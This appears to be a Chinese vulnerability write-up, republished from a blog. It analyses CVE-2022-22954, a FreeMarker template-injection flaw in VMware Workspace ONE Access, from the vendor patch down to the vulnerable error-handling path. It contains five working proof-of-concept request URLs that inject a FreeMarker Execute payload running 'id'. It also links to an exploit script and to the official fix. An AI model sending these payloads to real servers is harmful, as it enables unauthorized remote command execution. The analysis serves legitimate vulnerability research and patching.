当前位置:网站首页>【漏洞复现】CVE-2022-22954 VMware Workspace ONE Access漏洞分析

【漏洞复现】CVE-2022-22954 VMware Workspace ONE Access漏洞分析

2022-07-21 05:08:00 3Ss安全前线

文章目录

漏洞信息

VMware Workspace ONE Access(以前称为VMware Identity Manager)旨在通过多因素身份验证、条件访问和单点登录,让您的员工更快地访问SaaS、Web和本机移动应用程序。
近日VMware官网发布了VMware Workspace ONE Access存在多个漏洞:
在这里插入图片描述
其中漏洞编号CVE-2022-22954,CVSS评分为9.8,危害等级为严重。影响版本如下:

  • VMware Workspace ONE Access Appliance (版本号:20.10.0.0 ,20.10.0.1 ,21.08.0.0 ,21.08.0.1 )
  • VMware Identity Manager Appliance (版本号:3.3.3 , 3.3.4 , 3.3.5 ,3.3.6)
  • VMware Realize Automation (版本号:7.6)

漏洞分析

从补丁入手分析,官方给出修复脚本HW-154129-applyWorkaround.py,补丁地址如下:
https://vmware-gs.my.salesforce.com/sfc/p/#f40000003u6t/a/5G0000002Nla/9COLfZG7uu8iDjLoZTis5Ltzmd1H87iToXs9uLZF8IU
在这里插入图片描述
首先关注补丁文件对模板的修改,删除了endusercatalog-ui-1.0-SNAPSHOT-classes.jar 中自带的模板 customError.ftl
看一下这个文件,发现下图位置调用了freemarker引擎的eval函数来渲染errObj
在这里插入图片描述
在freemarker官网文档中给出了安全问题的提示
https://freemarker.apache.org/docs/ref_builtins_expert.html#ref_builtin_eval
此内置函数将字符串计算为FTL表达式,FTL表达式可以访问变量,并在它们上调用Java方法,因此(?eval)的字符串来自不受信任的来源,可能就会成为攻击媒介。可以判断是在customError渲染模板过程中产生了漏洞。
在这里插入图片描述
接着看那里可以渲染这个模板发现如下代码位置
com.vmware.endusercatalog.ui.web.UiErrorController#handleGenericError
并且设置了 errorObj 属性的值。
在这里插入图片描述
搜索handleUnauthorizedError调用关系发现两个函数,getErrorPage和handleUnauthorizedError
在这里插入图片描述
handleUnauthorizedError也在getErrorPage中,所以继续跟进getErrorPage
在这里插入图片描述
继续寻找/ui/view/error的调用,因为这是一个API接口,无法从请求中提javax.servlet.error.message,导致目标渲染的内容不可控。通过搜索找到另一处调用位于UiApplicationExceptionResolver#resolveException:
在这里插入图片描述
存在javax.servlet.error.message赋值过程,继续跟进发现两个异常处理类handleHttpMediaTypeNotAcceptableException、handleAnyGenericException
调用
在这里插入图片描述
在这里插入图片描述
可以看出handleAnyGenericException适配的异常更通用需要通过全局异常处理函数UiApplicationExceptionResolver#handleAnyGenericException触发freemarker模板渲染,在 handleAnyGenericException 中,进入 resolveException 时会根据异常的类型传入不同的参数,
如果异常类不是 LocalizationParamValueException 子类的话则传入 uiRequest.getRequestId(),所以还要抛出 LocalizationParamValueException 异常类或其子类异常且其构造函数可控的地方。
在这里插入图片描述
这里有一个InvalidAuthContextException异常,继承于LocalizationParamValueException
在这里插入图片描述
在 AuthContext 的构造函数中抛出该异常
在这里插入图片描述
参数均来自于传入的 AuthContext.Builder builder 对象。而生成 AuthContext对象的地方在AuthContextPopulationInterceptor 拦截器中,而且各项参数均是从请求中获取,可控。但该拦截器类是在 endusercatalog-auth-1.0-SNAPSHOT.jar 中的,正常情况下无法访问到类,但从 UiApplication.class 发现其使用了 @ComponentScan 注解将 该auth包的类装配进了bean容器。
在这里插入图片描述
在包中查找添加该拦截器的地方,处于 endusercatalog\ui\config\WebConfig.class 中。
在这里插入图片描述
匹配的URL如下
在这里插入图片描述
梳理接口见复现POC

漏洞复现

搭建漏洞利用环境
搭建环境进行虚拟机导入,下载存在漏洞的VMware Workspace ONE Access OVA文件,主机名需要设置为域名
在这里插入图片描述
搭建成功
在这里插入图片描述
漏洞验证POC如下:

  • /catalog-portal/ui?code=&deviceUdid=&deviceType=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
  • /catalog-portal/hub-ui?deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
  • /catalog-portal/hub-ui/byob?deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
  • /catalog-portal/ui/oauth/verify?error=&deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
  • /catalog-portal/ui/oauth/verify?code=&deviceType=&deviceUdid=%24%7B"freemarker.template.utility.Execute"%3Fnew%28%29%28"id"%29%7D
    burp发送验证代码执行成功
    在这里插入图片描述

测试脚本

漏洞测试脚本已编写完毕,下载链接如下:
https://github.com/3SsFuck/CVE-2022-22954-POC
效果图如下:
在这里插入图片描述

漏洞修复

参考漏洞影响范围进行排查。目前官方已发布修复补丁,请查看官方消息进行修复:https://kb.vmware.com/s/article/88099

参考文章

[1]https://mp.weixin.qq.com/s/X_E0zWONLVUQcgP6nZ78Mw
[2]https://mp.weixin.qq.com/s/2qHhPs1HcEXVQb7bkC3mcA
[3]https://xz.aliyun.com/t/11196

原网站

版权声明
本文为[3Ss安全前线]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_44978149/article/details/124268433

边栏推荐

猜你喜欢

随机推荐